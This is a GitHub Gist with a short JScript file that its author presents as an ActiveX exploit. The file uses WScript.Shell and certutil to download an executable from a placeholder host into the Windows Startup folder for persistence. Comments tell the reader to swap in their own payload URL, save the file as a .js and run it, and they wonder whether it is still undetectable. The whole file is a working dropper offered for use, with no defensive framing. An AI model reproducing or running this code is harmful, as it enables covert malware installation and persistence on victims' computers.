Created
March 10, 2021 08:30
-
-
Save angeloped/7e5a5b494535575defe3682e2a2a857e to your computer and use it in GitHub Desktop.
Exploit ActiveX with JS file. This was my idea at age 17 (2017). It worked before. I don't know if it still works in modern times.
This file contains hidden or bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| function exploit(){ | |
| var objShell = new ActiveXObject("WScript.shell"); | |
| objShell.run("certutil.exe -urlcache -f http://master/yourpayload.exe C:\\Users\\%USERNAME%\\AppData\\Roaming\\Microsoft\\Windows\\Start Menu\\Programs\\Startup\\payload.exe"); | |
| } | |
| exploit(); | |
| // change 'http://master/yourpayload.exe' | |
| // save it as anything.js | |
| // download this anything.js | |
| // (was it still undetectable?) | |
| // run! |
Sign up for free
to join this conversation on GitHub.
Already have an account?
Sign in to comment